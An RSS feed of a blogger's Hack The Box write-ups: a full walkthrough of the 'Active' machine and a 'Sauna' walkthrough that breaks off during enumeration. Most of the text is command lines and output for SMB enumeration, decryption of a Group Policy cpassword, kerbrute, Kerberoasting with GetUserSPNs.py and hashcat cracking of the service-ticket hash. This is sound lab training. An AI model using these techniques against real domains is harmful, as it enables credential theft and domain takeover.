<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Iftikhar Huseynov</title>
    <description>The latest articles on DEV Community by Iftikhar Huseynov (@iftikhar_911).</description>
    <link>https://dev.to/iftikhar_911</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4015093%2Ffdce4fe7-e0af-4ab7-b432-e015893f4b36.jpg</url>
      <title>DEV Community: Iftikhar Huseynov</title>
      <link>https://dev.to/iftikhar_911</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/iftikhar_911"/>
    <language>en</language>
    <item>
      <title>Active Ctf Hack The Box</title>
      <dc:creator>Iftikhar Huseynov</dc:creator>
      <pubDate>Mon, 06 Jul 2026 13:03:23 +0000</pubDate>
      <link>https://dev.to/iftikhar_911/active-ctf-hack-the-box-4453</link>
      <guid>https://dev.to/iftikhar_911/active-ctf-hack-the-box-4453</guid>
      <description>&lt;p&gt;Hi guys, what’s up. Welcome to my page. Today we are going to solve Active lab in HTB. The &lt;strong&gt;Active&lt;/strong&gt; machine on Hack The Box focuses on Active Directory enumeration and privilege escalation. It introduces common techniques such as SMB enumeration, Kerberoasting, and exploiting misconfigured domain accounts. Solving this machine requires a solid understanding of Windows authentication and domain services. It is considered an excellent lab for practicing real-world Active Directory attack paths. Overall, Active is a great beginner-friendly machine for learning fundamental Windows penetration testing techniques.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enumeration&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;nmap &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; 10.129.31.130 

Starting Nmap 7.99 &lt;span class="o"&gt;(&lt;/span&gt; https://nmap.org &lt;span class="o"&gt;)&lt;/span&gt; at 2026-07-06 05:57 &lt;span class="nt"&gt;-0400&lt;/span&gt;
Stats: 0:00:01 elapsed&lt;span class="p"&gt;;&lt;/span&gt; 0 hosts completed &lt;span class="o"&gt;(&lt;/span&gt;0 up&lt;span class="o"&gt;)&lt;/span&gt;, 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% &lt;span class="k"&gt;done
&lt;/span&gt;Nmap scan report &lt;span class="k"&gt;for &lt;/span&gt;10.129.31.130
Host is up &lt;span class="o"&gt;(&lt;/span&gt;0.25s latency&lt;span class="o"&gt;)&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
Not shown: 981 closed tcp ports &lt;span class="o"&gt;(&lt;/span&gt;reset&lt;span class="o"&gt;)&lt;/span&gt;
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 &lt;span class="o"&gt;(&lt;/span&gt;1DB15D39&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;Windows Server 2008 R2 SP1&lt;span class="o"&gt;)&lt;/span&gt;
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 &lt;span class="o"&gt;(&lt;/span&gt;1DB15D39&lt;span class="o"&gt;)&lt;/span&gt;
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos &lt;span class="o"&gt;(&lt;/span&gt;server &lt;span class="nb"&gt;time&lt;/span&gt;: 2026-07-06 10:01:45Z&lt;span class="o"&gt;)&lt;/span&gt;
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP &lt;span class="o"&gt;(&lt;/span&gt;Domain: active.htb, Site: Default-First-Site-Name&lt;span class="o"&gt;)&lt;/span&gt;
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP &lt;span class="o"&gt;(&lt;/span&gt;Domain: active.htb, Site: Default-First-Site-Name&lt;span class="o"&gt;)&lt;/span&gt;
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49167/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC&lt;span class="p"&gt;;&lt;/span&gt; OS: Windows&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   &lt;span class="nb"&gt;date&lt;/span&gt;: 2026-07-06T10:02:46
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;53,88,135,389,445 ports are open.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SMB enumeration&lt;/strong&gt;&lt;br&gt;
We can use msfconsole auxiliary module for enumerating shares.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;msfconsole &lt;span class="nt"&gt;-q&lt;/span&gt;
msf &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; search name:smb &lt;span class="nb"&gt;type&lt;/span&gt;:auxiliary

msf auxiliary&lt;span class="o"&gt;(&lt;/span&gt;scanner/smb/smb_enumshares&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; run
&lt;span class="o"&gt;[&lt;/span&gt;-] 10.129.31.130:139 - Login Failed: Unable to negotiate SMB1 with the remote host: Not a valid SMB packet
&lt;span class="o"&gt;[!]&lt;/span&gt; 10.129.31.130:445 - peer_native_os is only available with SMB1 &lt;span class="o"&gt;(&lt;/span&gt;current version: SMB2&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[!]&lt;/span&gt; 10.129.31.130:445 - peer_native_lm is only available with SMB1 &lt;span class="o"&gt;(&lt;/span&gt;current version: SMB2&lt;span class="o"&gt;)&lt;/span&gt;
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/recog-3.1.29/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator &lt;span class="s1"&gt;'+'&lt;/span&gt; and &lt;span class="s1"&gt;'?'&lt;/span&gt; was replaced with &lt;span class="s1"&gt;'*'&lt;/span&gt; &lt;span class="k"&gt;in &lt;/span&gt;regular expression
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - ADMIN&lt;span class="nv"&gt;$ &lt;/span&gt;- &lt;span class="o"&gt;(&lt;/span&gt;DISK|SPECIAL&lt;span class="o"&gt;)&lt;/span&gt; Remote Admin
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - C&lt;span class="nv"&gt;$ &lt;/span&gt;- &lt;span class="o"&gt;(&lt;/span&gt;DISK|SPECIAL&lt;span class="o"&gt;)&lt;/span&gt; Default share
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - IPC&lt;span class="nv"&gt;$ &lt;/span&gt;- &lt;span class="o"&gt;(&lt;/span&gt;IPC|SPECIAL&lt;span class="o"&gt;)&lt;/span&gt; Remote IPC
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - NETLOGON - &lt;span class="o"&gt;(&lt;/span&gt;DISK&lt;span class="o"&gt;)&lt;/span&gt; Logon server share 
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - Replication - &lt;span class="o"&gt;(&lt;/span&gt;DISK&lt;span class="o"&gt;)&lt;/span&gt; 
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - SYSVOL - &lt;span class="o"&gt;(&lt;/span&gt;DISK&lt;span class="o"&gt;)&lt;/span&gt; Logon server share 
&lt;span class="o"&gt;[&lt;/span&gt;+] 10.129.31.130:445 - Users - &lt;span class="o"&gt;(&lt;/span&gt;DISK&lt;span class="o"&gt;)&lt;/span&gt; 
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; 10.129.31.130: - Scanned 1 of 1 hosts &lt;span class="o"&gt;(&lt;/span&gt;100% &lt;span class="nb"&gt;complete&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; Auxiliary module execution completed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;7 shares we have. After check we have anonymous read permission on Replication shares.&lt;/p&gt;

&lt;p&gt;Inside the replication shares we should inspect the contents to determine whether there are any potentially sensitive or interesting files present.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight xml"&gt;&lt;code&gt;smbclient //10.129.31.130/Replication -U “”%””

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&amp;gt; get groups.xml -
&lt;span class="cp"&gt;&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;&lt;/span&gt;
&lt;span class="nt"&gt;&amp;lt;Groups&lt;/span&gt; &lt;span class="na"&gt;clsid=&lt;/span&gt;&lt;span class="s"&gt;"{3125E937-EB16-4b4c-9934-544FC6D24D26}"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;User&lt;/span&gt; &lt;span class="na"&gt;clsid=&lt;/span&gt;&lt;span class="s"&gt;"{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"&lt;/span&gt; &lt;span class="na"&gt;name=&lt;/span&gt;&lt;span class="s"&gt;"active.htb\SVC_TGS"&lt;/span&gt; &lt;span class="na"&gt;image=&lt;/span&gt;&lt;span class="s"&gt;"2"&lt;/span&gt; &lt;span class="na"&gt;changed=&lt;/span&gt;&lt;span class="s"&gt;"2018-07-18 20:46:06"&lt;/span&gt; &lt;span class="na"&gt;uid=&lt;/span&gt;&lt;span class="s"&gt;"{EF57DA28-5F69-4530-A59E-AAB58578219D}"&lt;/span&gt;&lt;span class="nt"&gt;&amp;gt;&amp;lt;Properties&lt;/span&gt; &lt;span class="na"&gt;action=&lt;/span&gt;&lt;span class="s"&gt;"U"&lt;/span&gt; &lt;span class="na"&gt;newName=&lt;/span&gt;&lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="na"&gt;fullName=&lt;/span&gt;&lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="na"&gt;description=&lt;/span&gt;&lt;span class="s"&gt;""&lt;/span&gt; &lt;span class="na"&gt;cpassword=&lt;/span&gt;&lt;span class="s"&gt;"edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"&lt;/span&gt; &lt;span class="na"&gt;changeLogon=&lt;/span&gt;&lt;span class="s"&gt;"0"&lt;/span&gt; &lt;span class="na"&gt;noChange=&lt;/span&gt;&lt;span class="s"&gt;"1"&lt;/span&gt; &lt;span class="na"&gt;neverExpires=&lt;/span&gt;&lt;span class="s"&gt;"1"&lt;/span&gt; &lt;span class="na"&gt;acctDisabled=&lt;/span&gt;&lt;span class="s"&gt;"0"&lt;/span&gt; &lt;span class="na"&gt;userName=&lt;/span&gt;&lt;span class="s"&gt;"active.htb&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There are groups.xml files which is stored credentials inside.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cracking the hash&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Gpp-decrypt can solve&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;User Flag&lt;/strong&gt;&lt;br&gt;
We found SVC_TGS ‘s password. So lets get in.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;smbclient //10.129.31.130/Users &lt;span class="nt"&gt;-U&lt;/span&gt; SVC_TGS
smb: &lt;span class="se"&gt;\S&lt;/span&gt;VC_TGS&lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;Desktop
smb: &lt;span class="se"&gt;\S&lt;/span&gt;VC_TGS&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;ls&lt;/span&gt;
  &lt;span class="nb"&gt;.&lt;/span&gt;                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                           AR       34  Mon Jul  6 05:57:18 2026

                5217023 blocks of size 4096. 275658 blocks available
smb: &lt;span class="se"&gt;\S&lt;/span&gt;VC_TGS&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; get user.txt -
&lt;span class="k"&gt;*********&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Kerberosting&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./kerbrute userenum &lt;span class="nt"&gt;-d&lt;/span&gt; active.htb &lt;span class="nt"&gt;--dc&lt;/span&gt; 10.129.31.130 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ &lt;span class="se"&gt;\/&lt;/span&gt; ___/ __ &lt;span class="se"&gt;\/&lt;/span&gt; ___/ / / / __/ _ &lt;span class="se"&gt;\&lt;/span&gt;
 / ,&amp;lt; /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|&lt;span class="se"&gt;\_&lt;/span&gt;__/_/  /_.___/_/   &lt;span class="se"&gt;\_&lt;/span&gt;_,_/&lt;span class="se"&gt;\_&lt;/span&gt;_/&lt;span class="se"&gt;\_&lt;/span&gt;__/                                        

Version: v1.0.3 &lt;span class="o"&gt;(&lt;/span&gt;9dad6e1&lt;span class="o"&gt;)&lt;/span&gt; - 07/06/26 - Ronnie Flathers @ropnop

2026/07/06 06:12:38 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;  Using KDC&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:
2026/07/06 06:12:38 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;   10.129.31.130:88

2026/07/06 06:13:29 &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;  &lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       administrator@active.htb
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Nothing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt;&lt;br&gt;
GetUserSPNs.py is an Impacket tool used to enumerate Service Principal Names (SPNs) in an Active Directory domain. With the -request option, it requests Kerberos service tickets (TGS) for service accounts, enabling Kerberoasting attacks by extracting ticket hashes for offline password cracking.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;GetUserSPNs.py &lt;span class="nt"&gt;-request&lt;/span&gt; &lt;span class="nt"&gt;-dc-ip&lt;/span&gt; 10.129.31.130 active.htb/SVC_TGS &lt;span class="nt"&gt;-save&lt;/span&gt; &lt;span class="nt"&gt;-outputfile&lt;/span&gt; active.out

/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'pkg_resources'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;.run_script&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'impacket==0.14.0.dev0+20251120.95652.9c2d8b61'&lt;/span&gt;, &lt;span class="s1"&gt;'GetUserSPNs.py'&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
&lt;span class="nt"&gt;--------------------&lt;/span&gt;  &lt;span class="nt"&gt;-------------&lt;/span&gt;  &lt;span class="nt"&gt;--------------------------------------------------------&lt;/span&gt;  &lt;span class="nt"&gt;--------------------------&lt;/span&gt;  &lt;span class="nt"&gt;--------------------------&lt;/span&gt;  &lt;span class="nt"&gt;----------&lt;/span&gt;
active/CIFS:445       Administrator  &lt;span class="nv"&gt;CN&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;Group Policy Creator Owners,CN&lt;span class="o"&gt;=&lt;/span&gt;Users,DC&lt;span class="o"&gt;=&lt;/span&gt;active,DC&lt;span class="o"&gt;=&lt;/span&gt;htb  2018-07-18 15:06:40.351723  2026-07-06 05:57:22.849416

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;*&lt;em&gt;Hash&lt;br&gt;
*&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;hashcat &lt;span class="nt"&gt;-m&lt;/span&gt; 18200 GetUserSPNs.out /usr/share/wordlists/rockyou.txt — force

&lt;span class="nv"&gt;$krb5tgs$23$*&lt;/span&gt;Administrator&lt;span class="nv"&gt;$ACTIVE&lt;/span&gt;.HTB&lt;span class="nv"&gt;$active&lt;/span&gt;.htb/Administrator&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="nv"&gt;$5158803791e7e090b15c7b17a883f1cf$2ca8851927cb8c16c1a1e444ccc89dd7f059644e2a22ac5a70ff32bb905167c58084d960659d37df47db978aa7e71f5604bd8d61cb2db35cb40e65d485ff63068270bee0cbd088d34d5f195b4c0b069fce0507a4212604ef64b372a5b05bdffd00a7b8725a781d4cb1eea039930e7fd3a4ec49369c55ac951f02af6940d8b060b1785252182a1c5e9b69b96883a25d1a9edd6552798bc115dd6412cde5507571cf2cc5833fba4671660a9048613c5b5ea0aa5455b1f2ab40f1bfde3b3fa6022a2c18e1a9e2f4d187d06656016c681ac91642402d3daa9e98e81775395318c05e1b63b97e31c3e5a82a9f7540a4e8284f171b319ceeef5281d6a5aaa70e703aad93ca2d1dd5ef6e2986769c3732259e81a5d09cd27c7db57d424c2c2061091122478bc27bc691cf1cbc1c091de37beacfbd5670eb5df2d3ca6a3fd21d43421e803e857caaf231aefceac6b144356c50f159d31cacc7b4a6367801baac3b65a795716507e9ca79176823c45a9517e17f261c21e59825eea4431ab3fc42953b3773e41d2686015aefd1a16708910ab70193e08b617d7b003bf63e575e431b20d4742e781532adf1e4b24549019007727ca6d5681df580ae33f2ae1c0d628968243fe1a52fc10e5b3fbc7e378bd3b5f4950a6ab973053baba84930312c76c083acf3bc4bb0cd31f082b2032fe255bc402c35408de18eb77857f27f882fc17f3d4b447f354f0e75e262764724de5881fb902ddce6c88c974bad0e423290bed826d567a0289521a5477b7b6a5349c87261b84de3e607ec7a4e3a6b429020125a514a18853efaa80b2e0149b098025c1a8dae792a2ada5e55d353c7f264e923b3fa8b8d1ca5e255f6cc8a6c8df9a1011900f7a2cf1584db8fe9ef2d9b6b35fae10a5e30d162db9b425408efcf6ce696ed0137fa43098ac1193a11bfbef6597062fe4dbc388ec9a10cd7eef44fd433a0ba6c7adefb0ab8dc360868ea09557c1681efd75ab3173265a4ef735a667f1f5fc8661a8458a2120028769bbfb40a61d0d10ad3e8670de04e807010d6c54110cc91d6261302974fdec509ffa5ae61078fd8dad91ed70c630687d8bd2b14f7f5a1d28e019f6bc4dd59138d6683f454fae9901481f1bfd6577c74ddba2dfdbd9658088ee12b5a0c3c03b8bfc37fad05aa289f7b410f086c353a48d604c1a5ad0d1ae9e9461dfbd19127eb5ee661b4eeeda9ab440d16a806782b5321057fcea6ac2cf77fe3967f7c0209772be2b80e2a&lt;/span&gt;:&lt;span class="k"&gt;*******&lt;/span&gt;

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Root Flag&lt;/strong&gt;&lt;br&gt;
We got administrator’s password.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;smbclient //10.129.31.130/Users &lt;span class="nt"&gt;-U&lt;/span&gt; Administrator
smb: &lt;span class="se"&gt;\A&lt;/span&gt;dministrator&lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;cd &lt;/span&gt;Desktop
smb: &lt;span class="se"&gt;\A&lt;/span&gt;dministrator&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;ls&lt;/span&gt;
  &lt;span class="nb"&gt;.&lt;/span&gt;                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                           AR       34  Mon Jul  6 05:57:18 2026

                5217023 blocks of size 4096. 279206 blocks available
smb: &lt;span class="se"&gt;\A&lt;/span&gt;dministrator&lt;span class="se"&gt;\D&lt;/span&gt;esktop&lt;span class="se"&gt;\&amp;gt;&lt;/span&gt; get root.txt -

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Stay safe. Goodbye&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>redteam</category>
      <category>pentester</category>
    </item>
    <item>
      <title>Sauna CTF HTB</title>
      <dc:creator>Iftikhar Huseynov</dc:creator>
      <pubDate>Sat, 04 Jul 2026 13:29:19 +0000</pubDate>
      <link>https://dev.to/iftikhar_911/sauna-ctf-htb-1lp0</link>
      <guid>https://dev.to/iftikhar_911/sauna-ctf-htb-1lp0</guid>
      <description>&lt;p&gt;Hi what’s up, welcome to my  page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enumeration&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;nmap -sV -sC 10.129.95.180&lt;br&gt;
Starting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400&lt;br&gt;
Nmap scan report for 10.129.95.180&lt;br&gt;
Host is up (0.21s latency).&lt;br&gt;
Not shown: 987 filtered tcp ports (no-response)&lt;br&gt;
PORT STATE SERVICE VERSION&lt;br&gt;
53/tcp open domain Simple DNS Plus&lt;br&gt;
80/tcp open http Microsoft IIS httpd 10.0&lt;br&gt;
|_http-server-header: Microsoft-IIS/10.0&lt;br&gt;
|_http-title: Egotistical Bank :: Home&lt;br&gt;
| http-methods: &lt;br&gt;
|_ Potentially risky methods: TRACE&lt;br&gt;
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z)&lt;br&gt;
135/tcp open msrpc Microsoft Windows RPC&lt;br&gt;
139/tcp open netbios-ssn Microsoft Windows netbios-ssn&lt;br&gt;
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)&lt;br&gt;
445/tcp open microsoft-ds?&lt;br&gt;
464/tcp open kpasswd5?&lt;br&gt;
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0&lt;br&gt;
636/tcp open tcpwrapped&lt;br&gt;
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)&lt;br&gt;
3269/tcp open tcpwrapped&lt;br&gt;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)&lt;br&gt;
|_http-server-header: Microsoft-HTTPAPI/2.0&lt;br&gt;
|_http-title: Not Found&lt;br&gt;
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows&lt;br&gt;
Host script results:&lt;br&gt;
| smb2-time: &lt;br&gt;
| date: 2026–07–04T00:17:20&lt;br&gt;
|_ start_date: N/A&lt;br&gt;
|_clock-skew: 6h59m50s&lt;br&gt;
| smb2-security-mode: &lt;br&gt;
| 3.1.1: &lt;br&gt;
|_ Message signing enabled and required&lt;/code&gt;&lt;br&gt;
As we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RPC port&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;rpcclient -U "" -N 10.129.95.180&lt;br&gt;
rpcclient $&amp;gt; enumdomusers&lt;br&gt;
result was NT_STATUS_ACCESS_DENIED&lt;br&gt;
rpcclient $&amp;gt; ^C&lt;/code&gt;&lt;br&gt;
We can’t use rpc port without authentication.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SMB port&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;`smbclient -L //10.129.95.180 
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
 - - - - - - - - - - -
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 - no workgroup available`
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same thing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;LDAP&lt;/strong&gt;&lt;br&gt;
We have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;`ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;extended LDIF
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;extended LDIF
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;LDAPv3
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;base &amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; with scope baseObject
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;filter: &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;objectClass&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;requesting: namingContexts 
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;search result
&lt;span class="go"&gt;search: 2
result: 0 Success

&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;numResponses: 2
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;numEntries: 1&lt;span class="sb"&gt;`&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Domain Controller- egotistical-bank.local. And there are no interesting things.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;KERBEROS&lt;/strong&gt;&lt;br&gt;
